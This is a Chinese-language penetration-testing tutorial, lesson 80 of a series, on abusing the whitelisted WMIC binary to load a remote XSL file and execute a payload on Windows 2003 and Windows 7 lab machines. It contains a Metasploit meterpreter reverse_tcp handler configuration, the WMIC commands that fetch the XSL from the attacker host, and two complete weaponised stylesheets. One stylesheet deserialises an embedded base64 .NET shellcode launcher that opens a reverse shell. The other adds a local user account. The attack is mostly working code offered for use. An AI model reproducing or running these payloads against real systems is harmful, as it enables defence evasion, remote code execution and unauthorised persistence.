第八十课:基于白名单Wmic执行payload第十季

注:请多喝点热水或者凉白开,可预防肾结石,通风等。

Wmic简介:

WMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。

说明:Wmic.exe所在路径已被系统添加PATH环境变量中,因此,Wmic命令可识别,需注意x86,x64位的Wmic调用。

Windows 2003 默认位置:

C:\WINDOWS\system32\wbem\wmic.exe
C:\WINDOWS\SysWOW64\wbem\wmic.exe

Windows 7 默认位置:

C:\Windows\System32\wbem\WMIC.exe
C:\Windows\SysWOW64\wbem\WMIC.exe

攻击机: 192.168.1.4 Debian 靶机: 192.168.1.119 Windows 2003 192.168.1.5 Windows 7

配置攻击机msf:

msf exploit(multi/handler) > show options 

Module options (exploit/multi/handler): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐ 

Payload options (windows/meterpreter/reverse_tcp): 

Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, proce ss, none)

LHOST 192.168.1.4 yes The listen address (an interface may be specified)

LPORT 53 yes The listen port 

Exploit target: 

Id Name

‐‐ ‐‐‐‐

0 Wildcard Target 23

靶机执行:

Windows 7:

C:\Windows\SysWOW64\wbem\WMIC.exe os get
/format:"http://192.168.1.4/Micropoor.xsl"
WMIC.exe os get /format:"http://192.168.1.4/Micropoor_2003.xsl"

附录:

Micropoor_Win7.xsl:

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas‐microsoft‐com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements‐prefix="user" language="JScript">

<![CDATA[ 

function setversion() {

}

function debug(s) {}

function base64ToStream(b) {

var enc = new ActiveXObject("System.Text.ASCIIEncoding");

var length = enc.GetByteCount_2(b);

var ba = enc.GetBytes_4(b);

var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");

ba = transform.TransformFinalBlock(ba, 0, length);

var ms = new ActiveXObject("System.IO.MemoryStream");

ms.Write(ba, 0, (length / 4) * 3);

ms.Position = 0;

return ms;

} 

var serialized_obj = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy"+
"AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph"+
"dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk"+
"ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD"+
"AAAACQQAAAAEAgAAADBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRl"+
"RW50cnkHAAAABHR5cGUIYXNzZW1ibHkGdGFyZ2V0EnRhcmdldFR5cGVBc3NlbWJseQ50YXJnZXRU"+
"eXBlTmFtZQptZXRob2ROYW1lDWRlbGVnYXRlRW50cnkBAQIBAQEDMFN5c3RlbS5EZWxlZ2F0ZVNl"+
"cmlhbGl6YXRpb25Ib2xkZXIrRGVsZWdhdGVFbnRyeQYFAAAAL1N5c3RlbS5SdW50aW1lLlJlbW90"+
"aW5nLk1lc3NhZ2luZy5IZWFkZXJIYW5kbGVyBgYAAABLbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAu"+
"MCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BgcAAAAH"+
"dGFyZ2V0MAkGAAAABgkAAAAPU3lzdGVtLkRlbGVnYXRlBgoAAAANRHluYW1pY0ludm9rZQoEAwAA"+
"ACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQd0YXJnZXQw"+
"B21ldGhvZDADBwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVu"+
"dHJ5Ai9TeXN0ZW0uUmVmbGVjdGlvbi5NZW1iZXJJbmZvU2VyaWFsaXphdGlvbkhvbGRlcgkLAAAA"+
"CQwAAAAJDQAAAAQEAAAAL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9u"+
"SG9sZGVyBgAAAAROYW1lDEFzc2VtYmx5TmFtZQlDbGFzc05hbWUJU2lnbmF0dXJlCk1lbWJlclR5"+
"cGUQR2VuZXJpY0FyZ3VtZW50cwEBAQEAAwgNU3lzdGVtLlR5cGVbXQkKAAAACQYAAAAJCQAAAAYR"+
"AAAALFN5c3RlbS5PYmplY3QgRHluYW1pY0ludm9rZShTeXN0ZW0uT2JqZWN0W10pCAAAAAoBCwAA"+
"AAIAAAAGEgAAACBTeXN0ZW0uWG1sLlNjaGVtYS5YbWxWYWx1ZUdldHRlcgYTAAAATVN5c3RlbS5Y"+
"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+
"NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+
"ZW1ibHkGFwAAAARMb2FkCg8MAAAAABQAAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+
"YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAVC1CXAAAAAAA"+
"AAAA4AACIQsBCwAADAAAAAYAAAAAAAAOKgAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+
"AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAwCkA"+
"AEsAAAAAQAAA0AIAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+
"AAAALnRleHQAAAAUCgAAACAAAAAMAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAA0AIAAABA"+
"AAAABAAAAA4AAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAASAAAAAAAAAAAA"+
"AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAAPApAAAAAAAASAAAAAIABQBEIgAAfAcAAAMAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQgIoBAAACgAA"+
"KAIAAAYAACoAAAAAAAAA/OiCAAAAYInlMcBki1Awi1IMi1IUi3IoD7dKJjH/rDxhfAIsIMHPDQHH"+
"4vJSV4tSEItKPItMEXjjSAHRUYtZIAHTi0kY4zpJizSLAdYx/6zBzw0BxzjgdfYDffg7fSR15FiL"+
"WCQB02aLDEuLWBwB04sEiwHQiUQkJFtbYVlaUf/gX19aixLrjV1oMzIAAGh3czJfVGhMdyYHiej/"+
"0LiQAQAAKcRUUGgpgGsA/9VqCmjAqAEEaAIAADWJ5lBQUFBAUEBQaOoP3+D/1ZdqEFZXaJmldGH/"+
"1YXAdAr/Tgh17OhnAAAAagBqBFZXaALZyF//1YP4AH42izZqQGgAEAAAVmoAaFikU+X/1ZNTagBW"+
"U1doAtnIX//Vg/gAfShYaABAAABqAFBoCy8PMP/VV2h1bk1h/9VeXv8MJA+FcP///+mb////AcMp"+
"xnXBw7vwtaJWagBT/9UAAAATMAYAZQAAAAEAABEAIFUBAACNBgAAASXQAwAABCgGAAAKChYGjml+"+
"AQAABH4CAAAEKAMAAAYLBhYHbigHAAAKBo5pKAgAAAoAfgkAAAoMFg1+CQAAChMEFhYHEQQWEgMo"+
"BAAABgwIFSgFAAAGJisAKkogABAAAIABAAAEH0CAAgAABCpCU0pCAQABAAAAAAAMAAAAdjQuMC4z"+
"MDMxOQAAAAAFAGwAAABgAgAAI34AAMwCAABkAwAAI1N0cmluZ3MAAAAAMAYAAAgAAAAjVVMAOAYA"+
"ABAAAAAjR1VJRAAAAEgGAAA0AQAAI0Jsb2IAAAAAAAAAAgAAAVfVAjQJAgAAAPolMwAWAAABAAAA"+
"DwAAAAQAAAADAAAABgAAAAwAAAALAAAABAAAAAEAAAABAAAAAQAAAAEAAAADAAAAAQAAAAEAAAAB"+
"AAAAAQAAAAAACgABAAAAAAAGAEsARAAGAFsBPwEGAHcBPwEGAKYBhgEGAMYBhgEGAPcBRAAGAEEC"+
"hgEGAFwCRAAGAJgChgEGAKcCRAAGAK0CRAAGANACRAAGAAID4wIGABQD4wIGAEcDNwMAAAAAAQAA"+
"AAAAAQABAAEAEAAhACkABQABAAEAAAAAAPwBAAAFAAMABwATAQAAZgIAACEABAAHABEAXQASABEA"+
"aAASABMBhAI+AFAgAAAAAIYYUgAKAAEAwCEAAAAAkQBYAA4AAQAAAAAAgACRIH8AFQABAAAAAACA"+
"AJEgjAAdAAUAAAAAAIAAkSCZACgACwAxIgAAAACRGDADDgANAAAAAQCtAAAAAgC5AAAAAwC+AAAA"+
"BADPAAAAAQDZAAAAAgDsAAAAAwD4AAAABAAHAQAABQANAQAABgAdAQAAAQAoAQAAAgAwAREAUgAu"+
"ACEAUgA0ACkAUgAKAAkAUgAKADkAUgAKAEkAwAJCAGEA1wJKAGkACgNPAGEADwNYAHEAUgBkAHkA"+
"UgAKACcAWwA5AC4AEwBpAC4AGwByAGMAKwA5AAgABgCRAAEAVQEAAAQAWwAnAwABBwB/AAEAAAEJ"+
"AIwAAQAAAQsAmQABAGggAAADAASAAAAAAAAAAAAAAAAAAAAAAOQBAAAEAAAAAAAAAAAAAAABADsA"+
"AAAAAAQAAwAAAAA8TW9kdWxlPgB3bWlfY3NfZGxsX3BheWxvYWQuZGxsAFByb2dyYW0AU2hlbGxD"+
"b2RlTGF1bmNoZXIAbXNjb3JsaWIAU3lzdGVtAE9iamVjdAAuY3RvcgBNYWluAE1FTV9DT01NSVQA"+
"UEFHRV9FWEVDVVRFX1JFQURXUklURQBWaXJ0dWFsQWxsb2MAQ3JlYXRlVGhyZWFkAFdhaXRGb3JT"+
"aW5nbGVPYmplY3QAbHBTdGFydEFkZHIAc2l6ZQBmbEFsbG9jYXRpb25UeXBlAGZsUHJvdGVjdABs"+
"cFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUAbHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVh"+
"dGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBkd01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJp"+
"dHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNzaW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9u"+
"AFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2VydmljZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0"+
"dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJpYnV0ZQB3bWlfY3NfZGxsX3BheWxvYWQA"+
"Qnl0ZQA8UHJpdmF0ZUltcGxlbWVudGF0aW9uRGV0YWlscz57MEQxQTVERjAtRDZCNy00RUUzLUJB"+
"QzItOTY0MUUyREJCMDNFfQBDb21waWxlckdlbmVyYXRlZEF0dHJpYnV0ZQBWYWx1ZVR5cGUAX19T"+
"dGF0aWNBcnJheUluaXRUeXBlU2l6ZT0zNDEAJCRtZXRob2QweDYwMDAwMDItMQBSdW50aW1lSGVs"+
"cGVycwBBcnJheQBSdW50aW1lRmllbGRIYW5kbGUASW5pdGlhbGl6ZUFycmF5AEludFB0cgBvcF9F"+
"eHBsaWNpdABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMATWFyc2hhbABDb3B5AFplcm8A"+
"RGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyAC5jY3RvcgBTeXN0ZW0uU2VjdXJpdHkAVW52ZXJp"+
"ZmlhYmxlQ29kZUF0dHJpYnV0ZQAAAAAAAyAAAAAAAPBdGg231uNOusKWQeLbsD4ACLd6XFYZNOCJ"+
"AyAAAQMAAAECBgkHAAQJCQkJCQoABhgJCQkYCRAJBQACCRgJBSABARENBCABAQgEAQAAAAMGERAH"+
"AAIBEikRLQQAARgKCAAEAR0FCBgIAgYYCAcFHQUJGAkYBCABAQ4IAQAIAAAAAAAeAQABAFQCFldy"+
"YXBOb25FeGNlcHRpb25UaHJvd3MBgJ4uAYCEU3lzdGVtLlNlY3VyaXR5LlBlcm1pc3Npb25zLlNl"+
"Y3VyaXR5UGVybWlzc2lvbkF0dHJpYnV0ZSwgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3Vs"+
"dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5FQFUAhBTa2lwVmVy"+
"aWZpY2F0aW9uAQAAAOgpAAAAAAAAAAAAAP4pAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwKQAA"+
"AAAAAAAAX0NvckRsbE1haW4AbXNjb3JlZS5kbGwAAAAAAP8lACAAEAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAQAAAAGAAAgAAAAAAAAAAAAAAAAAAA"+
"AQABAAAAMAAAgAAAAAAAAAAAAAAAAAAAAQAAAAAASAAAAFhAAAB0AgAAAAAAAAAAAAB0AjQAAABW"+
"AFMAXwBWAEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQAAAAAAAAAAAAAAAAAAAAAA"+
"PwAAAAAAAAAEAAAAAgAAAAAAAAAAAAAAAAAAAEQAAAABAFYAYQByAEYAaQBsAGUASQBuAGYAbwAA"+
"AAAAJAAEAAAAVAByAGEAbgBzAGwAYQB0AGkAbwBuAAAAAAAAALAE1AEAAAEAUwB0AHIAaQBuAGcA"+
"RgBpAGwAZQBJAG4AZgBvAAAAsAEAAAEAMAAwADAAMAAwADQAYgAwAAAALAACAAEARgBpAGwAZQBE"+
"AGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAACAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4A"+
"AAAAADAALgAwAC4AMAAuADAAAABQABcAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAHcAbQBp"+
"AF8AYwBzAF8AZABsAGwAXwBwAGEAeQBsAG8AYQBkAC4AZABsAGwAAAAAACgAAgABAEwAZQBnAGEA"+
"bABDAG8AcAB5AHIAaQBnAGgAdAAAACAAAABYABcAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBu"+
"AGEAbQBlAAAAdwBtAGkAXwBjAHMAXwBkAGwAbABfAHAAYQB5AGwAbwBhAGQALgBkAGwAbAAAAAAA"+
"NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
"AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAIAAADAAAABA6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
"AAAAAAAAAAAAAAAAAAAAAAENAAAABAAAAAkXAAAACQYAAAAJFgAAAAYaAAAAJ1N5c3RlbS5SZWZs"+
"ZWN0aW9uLkFzc2VtYmx5IExvYWQoQnl0ZVtdKQgAAAAKCwAA";

var entry_class = 'ShellCodeLauncher.Program'; 

try {

setversion();

var stm = base64ToStream(serialized_obj);

var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');

var al = new ActiveXObject('System.Collections.ArrayList');

var d = fmt.Deserialize_2(stm);

al.Add(undefined);

var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 

} catch (e) {

debug(e.message);

} 

]]> </ms:script>

</stylesheet>

Micropoor_2003.xsl:

<?xml version='1.0'?>

<stylesheet

xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas‐microsoft‐com:xslt"

xmlns:user="placeholder"

version="1.0">

<output method="text"/>

<ms:script implements‐prefix="user" language="JScript">

<![CDATA[ 

var r = new ActiveXObject("WScript.Shell").Run("net user Micropoor Micropoor /add");

]]> </ms:script>

</stylesheet>

Micropoor

Last updated